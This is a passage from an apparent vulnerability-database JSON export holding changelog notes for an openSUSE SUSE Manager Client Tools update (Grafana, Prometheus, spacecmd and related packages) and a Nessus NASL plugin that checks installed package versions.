popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1148177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172462\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected SUSE Manager Client Tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dracut-saltboot\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"dracut-saltboot-0.1.1590413773.a959db7-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dracut-saltboot\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:dracut-saltboot"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-08-14T11:53:07", "differentElements": ["description"], "edition": 3}, {"bulletin": {"id": "OPENSUSE-2020-1105.NASL", "hash": "fec3b35c316c51b69235ce9697b100873e131a42b9b9b32b5f3e585f68b0fe3e", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n 